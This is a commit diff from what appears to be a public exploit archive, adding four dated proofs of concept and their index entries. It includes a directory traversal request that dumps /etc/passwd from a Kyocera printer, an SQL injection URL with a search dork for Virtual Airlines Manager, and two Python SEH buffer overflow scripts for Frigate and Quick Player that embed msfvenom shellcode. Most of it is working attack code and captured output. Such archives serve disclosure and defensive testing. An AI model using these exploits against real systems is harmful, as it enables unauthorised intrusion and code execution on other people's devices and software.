DB: 2020-06-09

4 changes to exploits/shellcodes Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC) Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH) Kyocera Printer d-COPIA253MF - Directory Traversal (PoC) Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection
2020-06-09 05:02:04 +00:00 · 2020-06-09 05:02:04 +00:00 · 590364ca2a
commit 590364ca2a
parent d0531a5e12
5 changed files with 255 additions and 0 deletions
--- a/exploits/hardware/webapps/48561.txt
+++ b/exploits/hardware/webapps/48561.txt
@ -0,0 +1,68 @@
+# Exploit Title : Kyocera Printer d-COPIA253MF - Directory Traversal (PoC)
+# Exploit Author: Hakan Eren ŞAN
+# Date: 2020-06-06
+# Vendor Homepage: https://www.kyoceradocumentsolutions.com.tr/tr.html
+# Version: d-COPIA253MF plus
+# Tested on : Linux
+# Credit: Berat Isler
+
+
+# First step , you can capture the main page
+# Then create a directory traveral payload like ../../../ this
+# Then you add nullbyte to the end of the payload(%00)
+# Last step sent your request
+
+This is the code :
+
+Request:
+
+
+GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm HTTP/1.1
+Host: X.X.X.X
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0)
+Gecko/20100101 Firefox/76.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: rtl=0
+Upgrade-Insecure-Requests: 1
+If-None-Match: "/wlmeng/index.htm, Thu, 04 Jun 2020 13:41:16 GMT"
+Cache-Control: max-age=0
+
+
+Response:
+
+HTTP/1.1 200 OK
+Content-Length: 843
+Date: Thu, 04 Jun 2020 16:09:54 GMT
+Server: KM-MFP-http/V0.0.1
+Last-Modified: Thu, 04 Jun 2020 13:41:16 GMT
+ETag: "/wlmeng/../../../../../../../../../../../etc/passwd, Thu, 04 Jun
+2020 13:41:16 GMT"
+Content-Type: text/html
+
+root::0:0:root:/root:/bin/sh
+bin:*:1:1:bin:/bin:/bin/sh
+daemon:*:2:2:daemon:/usr/sbin:/bin/sh
+sys:*:3:3:sys:/dev:/bin/sh
+adm:*:4:4:adm:/var/adm:/bin/sh
+lp:*:5:7:lp:/var/spool/lpd:/bin/sh
+sync:*:6:8:sync:/bin:/bin/sync
+shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown
+halt:*:8:10:halt:/sbin:/sbin/halt
+mail:*:9:11:mail:/var/mail:/bin/sh
+news:*:10:12:news:/var/spool/news:/bin/sh
+uucp:*:11:13:uucp:/var/spool/uucp:/bin/sh
+operator:*:12:0:operator:/root:/bin/sh
+games:*:13:60:games:/usr/games:/bin/sh
+ftp:*:15:14:ftp:/var/ftp:/bin/sh
+man:*:16:20:man:/var/cache/man:/bin/sh
+www:*:17:18:www-data:/var/www:/bin/sh
+sshd:*:18:19:sshd:/var/run/sshd:/bin/sh
+proxy:*:19:21:proxy:/bin:/bin/sh
+telnetd:*:20:22:proxy:/bin:/bin/sh
+backup:*:34:34:backup:/var/backups:/bin/sh
+ais:*:101:101:ais:/var/run/ais:/bin/sh
+nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
--- a/exploits/php/webapps/48562.txt
+++ b/exploits/php/webapps/48562.txt
@ -0,0 +1,23 @@
+# Exploit Title: Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection
+# Date: 2020-06-07
+# Exploit Author: Pankaj Kumar Thakur
+# Vendor Homepage: http://virtualairlinesmanager.net/
+# Dork: inurl:notam_id=
+# Affected Version: 2.6.2
+# Tested on: Ubuntu
+# CVE : N/A
+
+Vulnerable parameter 
+-------------------
+notam_id=%27%27
+
+Id parameter's value is going into sql query directly!
+
+Proof of concept
+---------------
+https://localhost:8080/vam/index.php?page=notam&notam_id=11%27%27
+
+
+Submitted: Jun 1 2020
+Fixed: Jun 5 2020
+Acknowledgement : https://ibb.co/Y3WYdFN
--- a/exploits/windows/local/48563.py
+++ b/exploits/windows/local/48563.py
@ -0,0 +1,70 @@
+# Exploit Title: Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC) 
+# Vendor Homepage: http://www.frigate3.com/ 
+# Software Link Download: http://www.frigate3.com/download/frigate3_pro.exe
+# Exploit Author: Paras Bhatia
+# Discovery Date: 2020-06-07
+# Vulnerable Software: Frigate
+# Version: <= 3.36.0.9
+# Vulnerability Type: Local Buffer Overflow
+# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)  
+
+#Steps to Produce the Crash:
+
+#   1.- Run python code: FrigateLCE.py
+#   2.- Copy content to clipboard
+#   3.- Turn off DEP for Frigate3.exe
+#   4.- Open "Frigate3.exe"
+#   5.- Go to "Command" > "Command Line" > "Activate Command Line"
+#   6.- Paste ClipBoard into the "Command Line" field which appears at the bottom of the Frigate application.
+#   7.- Press Enter from Keyboard.
+#   7.- Click on OK in the dialog box that appears.
+#   8.- Calc.exe runs.
+
+
+#################################################################################################################################################
+
+#Python "FrigateLCE.py" Code:
+
+f= open("FrigateLCE.txt", "w")
+
+junk="A" * 4112
+
+nseh="\xeb\x20\x90\x90"
+
+seh="\x4B\x0C\x01\x40"
+
+#40010C4B   5B               POP EBX
+#40010C4C   5D               POP EBP
+#40010C4D   C3               RETN
+#POP EBX ,POP EBP, RETN | [rtl60.bpl]  (C:\Program Files\Frigate3\rtl60.bpl)
+
+nops="\x90" * 50
+
+# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d"  -f python
+
+buf =  ""
+buf += "\xbf\xe3\xfa\x7b\x97\xdb\xd5\xd9\x74\x24\xf4\x5d\x2b"
+buf += "\xc9\xb1\x30\x83\xed\xfc\x31\x7d\x0f\x03\x7d\xec\x18"
+buf += "\x8e\x6b\x1a\x5e\x71\x94\xda\x3f\xfb\x71\xeb\x7f\x9f"
+buf += "\xf2\x5b\xb0\xeb\x57\x57\x3b\xb9\x43\xec\x49\x16\x63"
+buf += "\x45\xe7\x40\x4a\x56\x54\xb0\xcd\xd4\xa7\xe5\x2d\xe5"
+buf += "\x67\xf8\x2c\x22\x95\xf1\x7d\xfb\xd1\xa4\x91\x88\xac"
+buf += "\x74\x19\xc2\x21\xfd\xfe\x92\x40\x2c\x51\xa9\x1a\xee"
+buf += "\x53\x7e\x17\xa7\x4b\x63\x12\x71\xe7\x57\xe8\x80\x21"
+buf += "\xa6\x11\x2e\x0c\x07\xe0\x2e\x48\xaf\x1b\x45\xa0\xcc"
+buf += "\xa6\x5e\x77\xaf\x7c\xea\x6c\x17\xf6\x4c\x49\xa6\xdb"
+buf += "\x0b\x1a\xa4\x90\x58\x44\xa8\x27\x8c\xfe\xd4\xac\x33"
+buf += "\xd1\x5d\xf6\x17\xf5\x06\xac\x36\xac\xe2\x03\x46\xae"
+buf += "\x4d\xfb\xe2\xa4\x63\xe8\x9e\xe6\xe9\xef\x2d\x9d\x5f"
+buf += "\xef\x2d\x9e\xcf\x98\x1c\x15\x80\xdf\xa0\xfc\xe5\x10"
+buf += "\xeb\x5d\x4f\xb9\xb2\x37\xd2\xa4\x44\xe2\x10\xd1\xc6"
+buf += "\x07\xe8\x26\xd6\x6d\xed\x63\x50\x9d\x9f\xfc\x35\xa1"
+buf += "\x0c\xfc\x1f\xc2\xd3\x6e\xc3\x05"
+
+
+
+
+payload = junk + nseh + seh + nops + buf
+
+f.write(payload)
+f.close
--- a/exploits/windows/local/48564.py
+++ b/exploits/windows/local/48564.py
@ -0,0 +1,90 @@
+# Exploit Title: Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)
+# Date: 2020-06-05
+# Author: Felipe Winsnes
+# Software Link: http://download.cnet.com/Quick-Player/3640-2168_4-10871418.html
+# Version: 1.3
+# Tested on: Windows 7
+
+# Proof of Concept:
+
+# 1.- Run the python script "poc.py", it will create a new file "poc.m3l"
+# 2.- Open the application,
+# 3.- Click on the bottom-right button with the letters "PL"
+# 4.- Select the option "File"
+# 5.- Click "Load List"
+# 6.- Select poc.m3l
+# 7.- Profit
+
+# Blog where the vulnerability is discussed: https://whitecr0wz.github.io/posts/Exploiting-Quick-Player/
+# Direct proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings6/18.gif
+
+# msfvenom -p windows/messagebox TEXT=pwned! -e x86/unicode_mixed -f py EXITFUNC=thread BufferRegister=EAX 
+# Payload size: 640 bytes
+
+buf =  b""
+buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
+buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
+buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
+buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
+buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
+buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
+buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
+buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
+buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
+buf += b"\x47\x42\x39\x75\x34\x4a\x42\x37\x69\x5a\x4b\x73\x6b"
+buf += b"\x59\x49\x71\x64\x6f\x34\x69\x64\x70\x31\x4a\x32\x47"
+buf += b"\x42\x61\x67\x6e\x51\x35\x79\x43\x34\x64\x4b\x62\x51"
+buf += b"\x4c\x70\x64\x4b\x70\x76\x5a\x6c\x64\x4b\x74\x36\x4d"
+buf += b"\x4c\x44\x4b\x51\x36\x4b\x58\x64\x4b\x71\x6e\x6d\x50"
+buf += b"\x64\x4b\x4d\x66\x4e\x58\x70\x4f\x6b\x68\x31\x65\x4a"
+buf += b"\x53\x62\x39\x49\x71\x78\x51\x79\x6f\x58\x61\x53\x30"
+buf += b"\x42\x6b\x52\x4c\x6b\x74\x4f\x34\x52\x6b\x50\x45\x6d"
+buf += b"\x6c\x72\x6b\x6e\x74\x4c\x68\x33\x48\x69\x71\x4a\x4a"
+buf += b"\x52\x6b\x70\x4a\x6a\x78\x32\x6b\x31\x4a\x4d\x50\x6a"
+buf += b"\x61\x6a\x4b\x79\x53\x6e\x54\x4e\x69\x44\x4b\x6f\x44"
+buf += b"\x54\x4b\x6d\x31\x5a\x4e\x6d\x61\x39\x6f\x4e\x51\x69"
+buf += b"\x30\x49\x6c\x46\x4c\x45\x34\x45\x70\x52\x54\x7a\x67"
+buf += b"\x35\x71\x66\x6f\x5a\x6d\x49\x71\x77\x57\x58\x6b\x59"
+buf += b"\x64\x4d\x6b\x73\x4c\x4d\x54\x6d\x58\x32\x55\x59\x51"
+buf += b"\x34\x4b\x4f\x6a\x4b\x74\x4d\x31\x6a\x4b\x71\x56\x62"
+buf += b"\x6b\x7a\x6c\x70\x4b\x34\x4b\x6e\x7a\x6d\x4c\x6b\x51"
+buf += b"\x48\x6b\x62\x6b\x5a\x64\x44\x4b\x59\x71\x5a\x48\x52"
+buf += b"\x69\x71\x34\x6d\x54\x4b\x6c\x71\x51\x46\x63\x37\x42"
+buf += b"\x4c\x48\x6c\x69\x38\x54\x62\x69\x58\x65\x52\x69\x79"
+buf += b"\x32\x72\x48\x44\x4e\x6e\x6e\x4c\x4e\x78\x6c\x32\x32"
+buf += b"\x5a\x48\x45\x4f\x49\x6f\x49\x6f\x4b\x4f\x53\x59\x71"
+buf += b"\x35\x69\x74\x77\x4b\x7a\x4f\x68\x4e\x49\x50\x51\x50"
+buf += b"\x64\x47\x4b\x6c\x6c\x64\x31\x42\x49\x58\x52\x6e\x59"
+buf += b"\x6f\x39\x6f\x49\x6f\x62\x69\x71\x35\x7a\x68\x33\x38"
+buf += b"\x30\x6c\x52\x4c\x6b\x70\x4e\x61\x71\x58\x4d\x63\x50"
+buf += b"\x32\x4e\x4e\x4f\x74\x52\x48\x71\x65\x34\x33\x32\x45"
+buf += b"\x31\x62\x4e\x50\x77\x6b\x62\x68\x71\x4c\x4e\x44\x4a"
+buf += b"\x6a\x52\x69\x6b\x36\x6e\x76\x79\x6f\x4f\x65\x6a\x64"
+buf += b"\x55\x39\x35\x72\x72\x30\x65\x6b\x56\x48\x77\x32\x6e"
+buf += b"\x6d\x75\x6c\x74\x47\x6d\x4c\x4f\x34\x62\x32\x5a\x48"
+buf += b"\x51\x4f\x4b\x4f\x49\x6f\x39\x6f\x73\x38\x70\x6f\x71"
+buf += b"\x68\x31\x48\x4b\x70\x53\x38\x50\x61\x4f\x77\x43\x35"
+buf += b"\x71\x32\x51\x58\x30\x4d\x30\x65\x72\x53\x53\x43\x6e"
+buf += b"\x51\x57\x6b\x63\x58\x6f\x6c\x6b\x74\x6a\x6a\x45\x39"
+buf += b"\x39\x53\x62\x48\x71\x54\x4d\x51\x6e\x78\x6d\x50\x61"
+buf += b"\x58\x70\x70\x31\x67\x32\x4e\x51\x55\x4d\x61\x69\x39"
+buf += b"\x72\x68\x6e\x6c\x6d\x54\x4b\x56\x33\x59\x48\x61\x4e"
+buf += b"\x51\x49\x42\x4f\x62\x30\x53\x4e\x71\x51\x42\x79\x6f"
+buf += b"\x38\x50\x6e\x51\x75\x70\x32\x30\x69\x6f\x32\x35\x4c"
+buf += b"\x48\x41\x41"
+
+alignment = "\x54\x71"        # push esp, padding
+alignment += "\x58\x71"       # pop eax, padding
+alignment += "\x05\x20\x22"   # add eax, 0x22002000
+alignment += "\x71"           # Padding
+alignment += "\x2D\x19\x22"   # sub eax, 0x22001900
+alignment += "\x71"           # Padding
+alignment += "\x50\x71"       # push eax, padding
+alignment += "\xC3"           # retn
+
+ret = "\x71\x41" + "\xF2\x41" # 0x004100f2 : pop esi # pop ebx # ret 0x04 | startnull,unicode {PAGE_EXECUTE_READWRITE} [Quick Player.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.3.0.0 (C:\Program Files\Quick Player\Quick Player.exe)
+
+buffer = "A" * 536 + ret + "\x41\x71\x41\x71" + alignment + "A" * 73 + buf + "A" * 200
+f = open ("poc.m3l", "w")
+f.write(buffer)
+f.close()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11085,6 +11085,8 @@ id,file,description,date,author,type,platform,port
 48510,exploits/windows/local/48510.py,"GoldWave - Buffer Overflow (SEH Unicode)",2020-05-25,"Andy Bowden",local,windows,
 48517,exploits/windows/local/48517.py,"StreamRipper32 2.6 - Buffer Overflow (PoC)",2020-05-26,"Andy Bowden",local,windows,
 48543,exploits/windows/local/48543.txt,"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path",2020-06-04,Gobinathan,local,windows,
+48563,exploits/windows/local/48563.py,"Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC)",2020-06-08,"Paras Bhatia",local,windows,
+48564,exploits/windows/local/48564.py,"Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)",2020-06-08,"Felipe Winsnes",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42787,3 +42789,5 @@ id,file,description,date,author,type,platform,port
 48558,exploits/multiple/webapps/48558.txt,"Cayin Digital Signage System xPost 2.5 - Remote Command Injection",2020-06-04,LiquidWorm,webapps,multiple,
 48559,exploits/php/webapps/48559.txt,"Online Course Registration 1.0 - Authentication Bypass",2020-06-05,BKpatron,webapps,php,
 48560,exploits/php/webapps/48560.py,"Online-Exam-System 2015 - 'feedback' SQL Injection",2020-06-05,"Gus Ralph",webapps,php,
+48561,exploits/hardware/webapps/48561.txt,"Kyocera Printer d-COPIA253MF - Directory Traversal (PoC)",2020-06-08,"Hakan Eren ŞAN",webapps,hardware,
+48562,exploits/php/webapps/48562.txt,"Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection",2020-06-08,"Pankaj Kumar Thakur",webapps,php,